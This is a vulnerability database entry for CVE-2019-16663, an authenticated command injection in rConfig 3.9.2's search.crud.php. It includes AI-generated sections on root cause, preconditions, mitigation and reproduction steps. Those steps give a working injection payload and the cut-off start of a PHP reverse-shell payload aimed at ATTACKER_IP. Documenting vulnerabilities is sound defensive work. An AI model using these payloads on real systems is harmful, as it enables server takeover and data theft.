CVE-2019-16663
Description
An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to search.crud.php because the catCommand parameter is passed to the exec function without filtering, which can lead to command execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
rConfig 3.9.2 search.crud.php allows authenticated command injection via the catCommand parameter, enabling remote code execution.
Vulnerability
An authenticated command injection vulnerability exists in rConfig version 3.9.2. The search.crud.php file passes the catCommand parameter directly to the PHP exec function without any sanitization or filtering, allowing an authenticated attacker to inject arbitrary operating system commands. The vulnerability is triggered via a crafted GET request that must also include a non-empty searchTerm parameter to reach the vulnerable code path. [1][2]
Exploitation
An attacker must have valid credentials to authenticate to the rConfig web application. Once authenticated, the attacker sends a GET request to /search.crud.php with the searchTerm parameter set to any value and the catCommand parameter containing the malicious command injection payload. The injected command is executed on the underlying operating system with the privileges of the web server user. [1][2]
Impact
Successful exploitation allows an authenticated attacker to execute arbitrary system commands on the rConfig server. This can lead to full compromise of the server, including data exfiltration, installation of backdoors, lateral movement within the network, and potential disruption of configuration management operations for managed network devices. [1]
Mitigation
The vendor has released rConfig version 8 (V8 Core) as a complete rewrite, which is not affected by this vulnerability. Users should upgrade to rConfig V8 Core or later. No patch for version 3.9.2 is available, as it is an end-of-life release. As a workaround, restricting access to the rConfig web interface and applying strict web application firewall rules may help mitigate the risk. [1][3]
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- rConfig/rConfigdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation on the `catCommand` parameter allows an attacker to inject arbitrary shell commands into the `exec()` call."
Attack vector
An attacker must first authenticate to the rConfig web application. After logging in, they send a GET request to `/lib/crud/search.crud.php` with a `searchTerm` parameter (to pass an initial check) and a `catCommand` parameter containing the injected command. The `catCommand` value is concatenated into a `find` command string that is executed by `exec()` [ref_id=1]. The researcher demonstrated that a payload such as `""&&$(sleep 5)#` escapes the intended command context and allows arbitrary OS command execution [ref_id=1].
Affected code
The vulnerable code is in `/lib/crud/search.crud.php`. The `catCommand` GET parameter is concatenated directly into a shell command string on line 61 and then passed to `exec()` on line 63 without any sanitization or filtering [ref_id=1].
What the fix does
No patch or official fix has been published by the vendor. The advisory notes that the developer was contacted on 19/09/2019 but did not provide a fix release date or statement of intent to fix [ref_id=1]. Without a patch, the remediation guidance is to avoid using rConfig 3.9.2 or to implement input validation on the `catCommand` parameter before it reaches `exec()`.
Preconditions
- authAttacker must have valid rConfig user credentials
- networkAttacker must be able to send HTTP GET requests to the rConfig server
- inputThe `searchTerm` GET parameter must be supplied to pass the first conditional check
Reproduction
1. Authenticate to rConfig by POSTing credentials to `/lib/crud/userprocess.php`. 2. Send a GET request to `/lib/crud/search.crud.php?searchTerm=anything&catCommand=""&&$(sleep 5)#`. 3. Observe that the response is delayed by approximately 5 seconds, confirming command execution. 4. For a reverse shell, use the payload `""&&php -r '$sock=fsockopen("ATTACKER_IP",ATTACKER_PORT);exec("/bin/sh -i
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- drive.google.com/openmitrex_refsource_MISC
- drive.google.com/openmitrex_refsource_MISC
- gist.github.com/mhaskar/e7e454c7cb0dd9a139b0a43691e258a0mitrex_refsource_MISC
- rconfig.com/downloadmitrex_refsource_MISC
- shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.